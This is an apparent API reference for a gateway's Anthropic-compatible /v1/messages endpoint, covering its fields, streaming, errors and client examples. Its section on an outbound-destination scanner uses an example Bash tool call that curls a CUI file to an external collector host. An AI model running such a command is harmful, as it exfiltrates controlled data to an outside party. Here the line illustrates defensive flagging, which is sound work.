POST /v1/messages
An Anthropic-compatible Messages API, built so that coding agents such as Claude Code can target Consus Gateway directly. Every request is served by Claude Sonnet 4.5 on ITAR-compliant infrastructure.
Unlike /v1/chat/completions, this endpoint is single-model by design. The model field in the request body is accepted but ignored. The compliance boundary is enforced at the architecture level: there is no path through this endpoint to a non-ITAR model.
Request
| Header | Required | Description |
|---|---|---|
| x-api-key | Yes | Your API key |
| Content-Type | Yes | application/json |
| anthropic-version | No | Accepted but ignored. The gateway manages the version field for upstream compatibility. Use the body field anthropic_version to override. |
Body
The body is forwarded as native Anthropic Messages API JSON. Refer to Anthropic’s Messages API reference for the full schema.
The gateway validates two fields and lets the upstream model validate everything else:
| Field | Required | Description |
|---|---|---|
| messages | Yes | Non-empty array. |
| max_tokens | Yes | Positive integer. |
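The two gateway-side checks can be mirrored on the client to fail fast before a request is sent. The following is a minimal sketch, not the gateway's actual implementation: the function names `preflight_error` and `_invalid` are hypothetical, and the wording of the messages error is an assumption (only the max_tokens message appears in this page).

```python
from typing import Optional


def _invalid(message: str) -> dict:
    """Build an error body in the Anthropic error shape."""
    return {"type": "error", "error": {"type": "invalid_request_error", "message": message}}


def preflight_error(body: dict) -> Optional[dict]:
    """Return an Anthropic-shaped error dict, or None if both checks pass."""
    messages = body.get("messages")
    if not isinstance(messages, list) or len(messages) == 0:
        # Hypothetical wording; the gateway's real message may differ.
        return _invalid("'messages' must be a non-empty array.")

    max_tokens = body.get("max_tokens")
    # bool is a subclass of int in Python, so exclude it explicitly.
    if isinstance(max_tokens, bool) or not isinstance(max_tokens, int) or max_tokens <= 0:
        return _invalid("'max_tokens' must be a positive integer.")

    return None
```

Everything else in the body is left untouched here, on the assumption that the upstream model remains the authority for the rest of the schema.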
The gateway handles the remaining fields as follows:
- model: accepted but ignored. Every request is served by Sonnet 4.5.
- stream: controls the SSE response shape; see Streaming below.
- anthropic_version: managed by the gateway for upstream compatibility. An explicit value in the body wins.
- Anthropic features the upstream provider does not yet support (e.g. context_management) are stripped before forwarding.
- All other fields (system, temperature, top_p, tools, tool_choice, stop_sequences, metadata, …) pass through unchanged.
Response
| Header | Description |
|---|---|
| x-consus-served-model | The model that actually served the request. Always claude-sonnet-4-5. |
| x-request-id | UUID for tracing this request through gateway logs. |
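A client may want to log these two headers with every call. The sketch below assumes you already have the response headers as a mapping; the helper name `gateway_trace` and the shape of its return value are hypothetical.

```python
from typing import Mapping

EXPECTED_MODEL = "claude-sonnet-4-5"


def gateway_trace(headers: Mapping[str, str]) -> dict:
    """Pull the two gateway headers out of a response header mapping."""
    # HTTP header names are case-insensitive, so normalise before lookup.
    lowered = {name.lower(): value for name, value in headers.items()}
    served = lowered.get("x-consus-served-model")
    return {
        "served_model": served,
        "request_id": lowered.get("x-request-id"),
        # True only when the header is present and names the documented model.
        "model_ok": served == EXPECTED_MODEL,
    }
```

With the Anthropic Python SDK, the headers should be reachable through `client.messages.with_raw_response.create(...)`, whose result exposes `.headers` alongside `.parse()`; check this against the SDK version you have installed.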
Non-Streaming
The body is the native Anthropic Messages response, with one optional addition (x_consus_governance, see below).
{
  "id": "msg_01ABC...",
  "type": "message",
  "role": "assistant",
  "content": [
    {"type": "text", "text": "Hello! How can I help you?"}
  ],
  "model": "claude-sonnet-4-5",
  "stop_reason": "end_turn",
  "stop_sequence": null,
  "usage": {
    "input_tokens": 10,
    "output_tokens": 12
  }
}
Streaming
Set stream: true in the body to receive Server-Sent Events. The event sequence matches Anthropic’s streaming protocol:
event: message_start
data: {"type":"message_start","message":{...}}
event: content_block_start
data: {"type":"content_block_start","index":0,"content_block":{"type":"text","text":""}}
event: content_block_delta
data: {"type":"content_block_delta","index":0,"delta":{"type":"text_delta","text":"Hello!"}}
event: content_block_stop
data: {"type":"content_block_stop","index":0}
event: message_delta
data: {"type":"message_delta","delta":{"stop_reason":"end_turn","stop_sequence":null},"usage":{"output_tokens":12}}
event: message_stop
data: {"type":"message_stop"}
Tool use blocks emit content_block_delta with {"type":"input_json_delta","partial_json":"..."}.
Streaming caveat
The gateway buffers the upstream response before returning it to the client. The HTTP layer therefore delivers all SSE events at once after the upstream model finishes — the wire shape is correct, but incremental tokens are not delivered over time. Anthropic SDK clients that consume the SSE stream parse it correctly regardless.
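Because the events arrive in one piece, a client without the Anthropic SDK can parse the complete body after the fact. This is a minimal sketch using only the standard library; `iter_sse_events` and `collect_text` are hypothetical names, and the parser assumes each event carries a single data line, as in the sequence shown above.

```python
import json
from typing import Iterator, Tuple


def iter_sse_events(raw: str) -> Iterator[Tuple[str, dict]]:
    """Yield (event_name, data) pairs from a complete SSE body."""
    event_name = ""
    for line in raw.splitlines():
        if line.startswith("event:"):
            event_name = line[len("event:"):].strip()
        elif line.startswith("data:"):
            # Assumes one JSON document per data line.
            yield event_name, json.loads(line[len("data:"):].strip())


def collect_text(raw: str) -> str:
    """Concatenate every text_delta in the stream, in order."""
    parts = []
    for event_name, data in iter_sse_events(raw):
        delta = data.get("delta", {})
        if event_name == "content_block_delta" and delta.get("type") == "text_delta":
            parts.append(delta["text"])
    return "".join(parts)
```

Tool-use deltas (input_json_delta) are skipped by `collect_text`; a fuller client would accumulate their partial_json fragments per content block index.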
Tool definitions and tool_use content blocks pass through natively. There is no translation through OpenAI’s tool_calls shape.
When a model returns tool_use blocks, the gateway scans each input payload for outbound destinations (URLs with a scheme like https://, ftp://, s3://, data:, mailto:, and raw IPv4 addresses). When any are found, the response includes an advisory x_consus_governance field alongside the standard Anthropic body. The tool_use block itself is not modified.
{
  "id": "msg_01...",
  "type": "message",
  "role": "assistant",
  "content": [
    {
      "type": "tool_use",
      "id": "toolu_01...",
      "name": "Bash",
      "input": {"command": "curl https://collector.example.com/ingest -d @cui.txt"}
    }
  ],
  "model": "claude-sonnet-4-5",
  "stop_reason": "tool_use",
  "usage": {"input_tokens": 20, "output_tokens": 30},
  "x_consus_governance": {
    "flags": [
      {
        "tool_call_id": "toolu_01...",
        "tool_name": "Bash",
        "destinations": ["https://collector.example.com/ingest"],
        "reason": "external_destination"
      }
    ]
  }
}
In streaming mode, flagged responses receive a final consus_governance SSE event after message_stop:
event: consus_governance
data: {"type":"consus_governance","x_consus_governance":{"flags":[...]}}
This is an advisory signal. The gateway does not block or redact tool calls — your application receives the real input and decides what to do with the destinations.
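Since the decision is left to the application, one option is to compare the flagged destinations against a host allowlist before executing a tool call. The sketch below is one possible policy, not something the gateway prescribes: `review_tool_calls` and `ALLOWED_HOSTS` are hypothetical, and any destination without a parseable hostname (raw IPv4 addresses, data:, mailto:) is treated as not allowed.

```python
from urllib.parse import urlparse

ALLOWED_HOSTS = frozenset({"internal.example.com"})  # hypothetical allowlist


def review_tool_calls(response: dict, allowed_hosts=ALLOWED_HOSTS) -> dict:
    """Map each flagged tool_call_id to its destinations that are not allowlisted."""
    flags = response.get("x_consus_governance", {}).get("flags", [])
    blocked = {}
    for flag in flags:
        # urlparse(...).hostname is None when the string has no //host part,
        # so such destinations always land in the blocked list.
        bad = [
            dest
            for dest in flag.get("destinations", [])
            if urlparse(dest).hostname not in allowed_hosts
        ]
        if bad:
            blocked.setdefault(flag["tool_call_id"], []).extend(bad)
    return blocked
```

An empty result means either nothing was flagged or every flagged destination is on the allowlist; the application can then run the tool call as returned.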
Errors
Errors are returned in Anthropic’s error shape:
{
  "type": "error",
  "error": {
    "type": "invalid_request_error",
    "message": "'max_tokens' must be a positive integer."
  }
}
| Status | Anthropic error.type | When |
|---|---|---|
| 400 | invalid_request_error | Body is not valid JSON, messages empty/missing, max_tokens missing or non-positive, or the upstream model rejected the request. |
| 401 | authentication_error | API key is missing or invalid. |
| 429 | rate_limit_error | Upstream model rate limit, or your key’s rate/quota limit. |
| 500 / 502 / 504 | api_error | Internal error, upstream provider outage, or upstream timeout. |
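The table above can be turned into a small client-side classifier. This is a sketch under stated assumptions: `classify_error` and `RETRYABLE_STATUSES` are hypothetical, and treating 429 and the 5xx statuses as retryable is a policy choice made for illustration (a 429 caused by an exhausted quota will not clear on retry).

```python
import json

RETRYABLE_STATUSES = {429, 500, 502, 504}  # assumption: treat these as transient


def classify_error(status: int, body_text: str) -> dict:
    """Summarise a failed response as error type, message, and a retry hint."""
    error = {}
    try:
        parsed = json.loads(body_text)
        if isinstance(parsed, dict) and isinstance(parsed.get("error"), dict):
            error = parsed["error"]
    except ValueError:
        # The body was not JSON (for example, an HTML page from a proxy).
        pass
    return {
        "type": error.get("type", "unknown"),
        "message": error.get("message", ""),
        "retry": status in RETRYABLE_STATUSES,
    }
```

A caller would typically pair the retry hint with exponential backoff and log the x-request-id response header for any error it gives up on.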
Known Limitations
- No /v1/messages/count_tokens. Clients that call it (Anthropic SDK in some configurations) fall back to client-side estimation; this works for Claude Code in practice.
- Streaming buffers at the gateway boundary. See the streaming caveat above.
- Single-model endpoint. The model field is ignored. If you need a different model, use /v1/chat/completions.
Examples
curl
curl -X POST https://api.consus.io/v1/messages \
  -H "x-api-key: $CONSUS_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "max_tokens": 256,
    "messages": [{"role": "user", "content": "Hello."}]
  }'
Anthropic Python SDK
import os

from anthropic import Anthropic

# Python does not expand "$CONSUS_API_KEY" inside a string, so read it from the environment.
api_key = os.environ["CONSUS_API_KEY"]

client = Anthropic(
    base_url="https://api.consus.io",
    api_key=api_key,
    default_headers={"x-api-key": api_key},
)
message = client.messages.create(
    model="claude-sonnet-4-5",  # ignored by the gateway, kept for SDK compatibility
    max_tokens=256,
    messages=[{"role": "user", "content": "Hello."}],
)
print(message.content[0].text)